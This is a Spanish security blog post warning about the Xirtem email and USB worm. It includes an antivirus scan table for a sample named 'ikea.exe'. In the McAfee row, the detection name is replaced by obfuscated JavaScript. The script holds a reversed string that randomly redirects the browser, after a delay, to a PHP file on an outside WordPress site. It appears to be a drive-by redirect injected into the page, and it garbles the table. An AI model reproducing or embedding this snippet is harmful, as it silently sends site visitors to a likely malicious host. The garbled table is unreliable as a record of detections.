MALWARE XIRTEM, llega anexado a un mail que aparenta venir de empresas reconocidas:

Publicado el 30 noviembre 2010 ¬ 13:51 pmh.mscComentarios desactivados en MALWARE XIRTEM, llega anexado a un mail que aparenta venir de empresas reconocidas:

Segun nos indica INTECO, se está propagando un gusano a través de tantos medios como puede:

Gusano que se propaga por falsos correos simulando provenir de alguna conocida empresa, por redes de intercambio de archivos P2P, por carpetas compartidas y por dispositivos extraíbles. Una vez infecta un ordenador descarga otros virus en el equipo y deshabilita el antivirus para dificultar su eliminación.
File name: ikea.exe
Submission date: 2009-01-17 04:21:25 (UTC)
Current status: finished
Result: 26 /39 (66.7%)
 VT Community

not reviewed
 Safety score: – 
Compact Print results Antivirus Version Last Update Result
a-squared 4.0.0.73 2009.01.17 Worm.Win32.AutoRun!IK
AhnLab-V3 2009.1.15.0 2009.01.16 –
AntiVir 7.9.0.55 2009.01.16 TR/Dropper.Gen
Authentium 5.1.0.4 2009.01.16 W32/EmailWorm.OJN
Avast 4.8.1281.0 2009.01.16 Win32:Trojan-gen {Other}
AVG 8.0.0.229 2009.01.16 Generic_r.AM
BitDefender 7.2 2009.01.17 Trojan.Dropper.BGKD
CAT-QuickHeal 10.00 2009.01.16 Worm.AutoRun.esn
ClamAV 0.94.1 2009.01.16 –
Comodo 933 2009.01.16 –
DrWeb 4.44.0.09170 2009.01.17 –
eSafe 7.0.17.0 2009.01.15 toRun
K7AntiVirus 7.10.593 2009.01.16 –
Kaspersky 7.0.0.125 2009.01.17 Worm.Win32.AutoRun.esn
McAfee 5497 2009.01.16 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Xirtem@MM”>W32/Xirtem@MM
Microsoft 1.4205 2009.01.17 Worm:Win32/Prolaco.gen!B
NOD32 3772 2009.01.16 Win32/AutoRun.Agent.GN
Norman 5.93.01 2009.01.16 W32/AutoRun.KWO
nProtect 2009.1.8.0 2009.01.16 Worm/W32.AutoRun.350208.D
Panda 9.5.1.2 2009.01.16 W32/AutoRun.DJ.worm
PCTools 4.4.2.0 2009.01.16 –
Prevx1 V2 2009.01.17 Cloaked Malware
Rising 21.12.42.00 2009.01.16 –
SecureWeb-Gateway 6.7.6 2009.01.16 Trojan.Dropper.Gen
Sophos 4.37.0 2009.01.17 Mal/CryptBox-A
Sunbelt 3.2.1835.2 2009.01.16 –
Symantec 10 2009.01.17 __________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Virus, , , , , , , , , , , ,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies